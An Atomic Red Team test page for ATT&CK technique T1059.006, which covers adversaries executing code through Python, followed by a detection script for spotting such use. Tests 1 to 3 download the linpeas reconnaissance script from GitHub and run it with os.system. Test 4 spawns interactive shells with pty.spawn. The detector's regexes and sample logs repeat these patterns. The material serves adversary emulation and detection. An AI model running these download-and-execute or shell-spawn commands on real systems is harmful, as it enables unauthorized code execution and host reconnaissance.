T1059.006 - Python
Adversaries may abuse Python commands and scripts for execution. Python is a very popular scripting/programming language, with capabilities to perform many functions. Python can be executed interactively from the command-line (via the python.exe interpreter) or via scripts (.py) that can be written and distributed to different systems. Python code can also be compiled into binary executables.
Python comes with many built-in packages to interact with the underlying system, such as file operations and device I/O. Adversaries can use these libraries to download and execute commands or other scripts as well as perform various malicious behaviors.
Atomic Tests
Atomic Test #1 - Execute shell script via python's command mode argument
Download a shell script, write it to a file, then execute it locally using Python -c (command mode).
Supported Platforms: linux
Dependencies: Run with `sh`!
Description: Verify that python is in the PATH environment variable and attempt to import the requests library.
Check Prereq Commands:
which_python=$(which python || which python3 || which python3.9 || which python2); $which_python -V
$which_python -c 'import requests' 2>/dev/null; echo $?
Get Prereq Commands:
pip install requests
Invoke-AtomicTest T1059.006 -TestNumbers 1 -GetPreReqs
Attack Commands: Run with `sh`
which_python=$(which python || which python3 || which python3.9 || which python2)
$which_python -c 'import requests;import os;url = "https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh";malicious_command = "sh T1059.006-payload -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles";session = requests.session();source = session.get(url).content;fd = open("T1059.006-payload", "wb+");fd.write(source);fd.close();os.system(malicious_command)'
Invoke-AtomicTest T1059.006 -TestNumbers 1
Cleanup:
rm T1059.006-payload
Invoke-AtomicTest T1059.006 -TestNumbers 1 -Cleanup
Atomic Test #2 - Execute Python via scripts
Create a Python file (.py) that downloads and executes a shell script via the executor arguments.
Supported Platforms: linux
Dependencies: Run with `sh`!
Description: Requires Python
Check Prereq Commands:
which_python=$(which python || which python3 || which python3.9 || which python2); $which_python -V
$which_python -c 'import requests' 2>/dev/null; echo $?
Get Prereq Commands:
pip install requests
Invoke-AtomicTest T1059.006 -TestNumbers 2 -GetPreReqs
Attack Commands: Run with `sh`
which_python=$(which python || which python3 || which python3.9 || which python2)
echo 'import requests' > T1059.006.py
echo 'import os' >> T1059.006.py
echo 'url = "https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh"' >> T1059.006.py
echo 'malicious_command = "sh T1059.006-payload -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles"' >> T1059.006.py
echo 'session = requests.session()' >> T1059.006.py
echo 'source = session.get(url).content' >> T1059.006.py
echo 'fd = open("T1059.006-payload", "wb+")' >> T1059.006.py
echo 'fd.write(source)' >> T1059.006.py
echo 'fd.close()' >> T1059.006.py
echo 'os.system(malicious_command)' >> T1059.006.py
$which_python T1059.006.py
Invoke-AtomicTest T1059.006 -TestNumbers 2
Cleanup:
rm T1059.006.py T1059.006-payload
Invoke-AtomicTest T1059.006 -TestNumbers 2 -Cleanup
Atomic Test #3 - Execute Python via Python executables
Create a Python file (.py), then compile it to bytecode (.pyc) that downloads an external malicious script and executes it locally using the supplied executor and arguments.
Supported Platforms: linux
Dependencies: Run with `sh`!
Description: Requires Python
Check Prereq Commands:
which_python=$(which python || which python3 || which python3.9 || which python2); $which_python -V
$which_python -c 'import requests' 2>/dev/null; echo $?
Get Prereq Commands:
pip install requests
Invoke-AtomicTest T1059.006 -TestNumbers 3 -GetPreReqs
Attack Commands: Run with `sh`
which_python=$(which python || which python3 || which python3.9 || which python2)
echo 'import requests' > T1059.006.py
echo 'import os' >> T1059.006.py
echo 'url = "https://github.com/carlospolop/PEASS-ng/releases/download/20220214/linpeas.sh"' >> T1059.006.py
echo 'malicious_command = "sh T1059.006-payload -q -o SysI, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles"' >> T1059.006.py
echo 'session = requests.session()' >> T1059.006.py
echo 'source = session.get(url).content' >> T1059.006.py
echo 'fd = open("T1059.006-payload", "wb+")' >> T1059.006.py
echo 'fd.write(source)' >> T1059.006.py
echo 'fd.close()' >> T1059.006.py
echo 'os.system(malicious_command)' >> T1059.006.py
$which_python -c 'import py_compile; py_compile.compile("T1059.006.py", "T1059.006.pyc")'
$which_python T1059.006.pyc
Invoke-AtomicTest T1059.006 -TestNumbers 3
Cleanup:
rm T1059.006.pyc T1059.006.py T1059.006-payload
Invoke-AtomicTest T1059.006 -TestNumbers 3 -Cleanup
Atomic Test #4 - Python pty module and spawn function used to spawn sh or bash
Uses the Python spawn function to spawn a sh shell followed by a bash shell. Per Volexity, this technique was observed in exploitation of Atlassian Confluence [CVE-2022-26134]. Reference: https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence
Supported Platforms: linux
Dependencies: Run with `sh`!
Description: Verify that python is in the PATH environment variable and attempt to import the requests library.
Check Prereq Commands:
which_python=$(which python || which python3 || which python3.9 || which python2); $which_python -V
$which_python -c 'import requests' 2>/dev/null; echo $?
Get Prereq Commands:
pip install requests
Invoke-AtomicTest T1059.006 -TestNumbers 4 -GetPreReqs
Attack Commands: Run with `sh`
which_python=$(which python || which python3 || which python3.9 || which python2)
$which_python -c "import pty;pty.spawn('/bin/sh')"
exit
$which_python -c "import pty;pty.spawn('/bin/bash')"
exit
Invoke-AtomicTest T1059.006 -TestNumbers 4
Detection
Monitor systems for abnormal Python usage and python.exe behavior, which could be an indicator of malicious activity. Understanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.
Scripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information Discovery, Collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script.
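A starting point for the process and command-line monitoring described above, added here as an example that is not part of Atomic Red Team or the ATT&CK technique text: it parses process command lines, flags Python interpreter invocations that run inline code (-c) doing pty spawns, downloads, file writes or shell execution, and flags .pyc files handed directly to the interpreter. The sample command lines are constructed to mirror the tests on this page, and the indicator names and regexes are this example's own choices.

```python
"""Flag suspicious Python interpreter invocations in process command lines.
Added detection example for this page, not Atomic Red Team code. SAMPLE_CMDLINES
are constructed; indicator names and regexes are this example's own choices.
"""
import re
import shlex

# Interpreter basenames: python, python3, python3.9, python2, python.exe, any path
PYTHON_BIN = re.compile(r"^(?:.*[/\\])?python(?:\d(?:\.\d+)?)?(?:\.exe)?$")

# Patterns searched in the inline code passed via -c (Tests #1 and #4 above)
INLINE_RULES = {
    "pty_spawn": re.compile(r"\bpty\.spawn\s*\("),
    "shell_exec": re.compile(r"\bos\.system\s*\(|\bsubprocess\."),
    "download": re.compile(r"\brequests\.|\burllib\b"),
    "write_file": re.compile(r"\bopen\s*\([^)]*['\"]w[b+]*['\"]"),
}

SAMPLE_CMDLINES = [  # constructed log lines: three suspicious, two benign
    "python3 -c \"import pty;pty.spawn('/bin/sh')\"",
    "python3 -c 'import requests;import os;url = \"https://example.invalid/x.sh\";"
    "session = requests.session();source = session.get(url).content;"
    "fd = open(\"payload\", \"wb+\");fd.write(source);fd.close();os.system(\"sh payload\")'",
    "/usr/bin/python3 T1059.006.pyc",
    "/usr/bin/python3 /opt/app/manage.py migrate",
    "bash -c 'python3 --version'",
]

def classify(cmdline: str) -> list[str]:
    """Return the indicators matched by one process command line (empty if none)."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:  # unbalanced quotes in the log: fall back to a plain split
        argv = cmdline.split()
    if not argv or not PYTHON_BIN.match(argv[0]):
        return []
    hits = []
    if any(a.endswith(".pyc") for a in argv[1:]):  # bytecode run directly (Test #3)
        hits.append("pyc_execution")
    if "-c" in argv[1:]:
        hits.append("inline_code")
        # Join everything after -c so the rules also work on logs that lost the quoting
        code = " ".join(argv[argv.index("-c") + 1:])
        hits.extend(name for name, rx in INLINE_RULES.items() if rx.search(code))
    return hits

def scan(lines: list[str]) -> dict[str, list[str]]:
    """Map each command line that has indicators to its indicator list."""
    return {line: hits for line in lines if (hits := classify(line))}
```

Baseline the benign Python usage on each host first (as the Detection text recommends), then alert on the `pty_spawn`, `shell_exec` and `pyc_execution` indicators, which rarely appear in ordinary interpreter use.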